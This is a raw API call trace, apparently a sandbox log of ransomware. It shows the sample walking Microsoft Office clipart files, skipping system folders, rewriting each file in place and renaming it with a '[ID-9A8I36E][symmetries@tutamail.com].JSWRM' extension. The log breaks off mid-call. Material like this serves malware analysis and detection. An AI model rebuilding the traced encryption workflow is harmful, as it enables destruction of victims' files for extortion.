1 [0093.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0093.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0093.530] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03731_.WMF", cAlternateFileName="")) returned 1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2=".") returned 1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2="..") returned 1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2="...") returned 1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2="windows") returned -1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2="recovery") returned -1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2="perflogs") returned -1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2="documents and settings") returned 1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2="system volume information") returned -1 [0093.530] lstrcmpiW (lpString1="PE03731_.WMF", lpString2="msocache") returned 1 [0093.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0093.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03731_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03731_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03731_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0093.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03731_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03731_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03731_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0093.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03731_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.531] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2556) returned 1 [0093.531] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9f0) returned 0x20c6c0 [0093.531] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9f0, lpOverlapped=0x0) returned 1 [0093.532] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.533] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9f0, lpOverlapped=0x0) returned 1 [0093.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0093.533] CloseHandle (hObject=0x314) returned 1 [0093.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0093.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0093.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0093.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0093.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0093.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0093.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0093.533] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03731_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03731_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0093.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.534] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x78a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03795_.WMF", cAlternateFileName="")) returned 1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2=".") returned 1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2="..") returned 1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2="...") returned 1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2="windows") returned -1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2="recovery") returned -1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2="perflogs") returned -1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2="documents and settings") returned 1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2="system volume information") returned -1 [0093.534] lstrcmpiW (lpString1="PE03795_.WMF", lpString2="msocache") returned 1 [0093.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0093.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03795_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03795_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03795_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0093.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0093.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03795_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03795_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03795_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0093.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0093.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03795_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.535] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1930) returned 1 [0093.535] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x780) returned 0x20c6c0 [0093.535] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0093.537] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.537] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0093.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0093.537] CloseHandle (hObject=0x314) returned 1 [0093.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0093.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0093.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0093.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0093.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0093.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0093.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.537] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03795_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03795_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0093.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0093.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0093.538] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1020, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE04050_.WMF", cAlternateFileName="")) returned 1 [0093.538] lstrcmpiW (lpString1="PE04050_.WMF", lpString2=".") returned 1 [0093.538] lstrcmpiW (lpString1="PE04050_.WMF", lpString2="..") returned 1 [0093.538] lstrcmpiW (lpString1="PE04050_.WMF", lpString2="...") returned 1 [0093.538] lstrcmpiW (lpString1="PE04050_.WMF", lpString2="windows") returned -1 [0093.538] lstrcmpiW (lpString1="PE04050_.WMF", lpString2="recovery") returned -1 [0093.538] lstrcmpiW (lpString1="PE04050_.WMF", lpString2="perflogs") returned -1 [0093.539] lstrcmpiW (lpString1="PE04050_.WMF", lpString2="documents and settings") returned 1 [0093.539] lstrcmpiW (lpString1="PE04050_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.539] lstrcmpiW (lpString1="PE04050_.WMF", lpString2="system volume information") returned -1 [0093.539] lstrcmpiW (lpString1="PE04050_.WMF", lpString2="msocache") returned 1 [0093.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0093.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE04050_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE04050_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE04050_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0093.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE04050_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE04050_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE04050_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0093.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe04050_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.539] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4128) returned 1 [0093.540] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1020) returned 0x23fc98 [0093.540] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1020, lpOverlapped=0x0) returned 1 [0093.541] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.541] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1020, lpOverlapped=0x0) returned 1 [0093.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0093.541] CloseHandle (hObject=0x314) returned 1 [0093.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0093.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0093.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0093.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0093.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0093.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.542] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe04050_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe04050_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0093.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.543] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x37f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE05665_.WMF", cAlternateFileName="")) returned 1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2=".") returned 1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2="..") returned 1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2="...") returned 1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2="windows") returned -1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2="recovery") returned -1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2="perflogs") returned -1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2="documents and settings") returned 1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2="system volume information") returned -1 [0093.543] lstrcmpiW (lpString1="PE05665_.WMF", lpString2="msocache") returned 1 [0093.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0093.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05665_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05665_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, 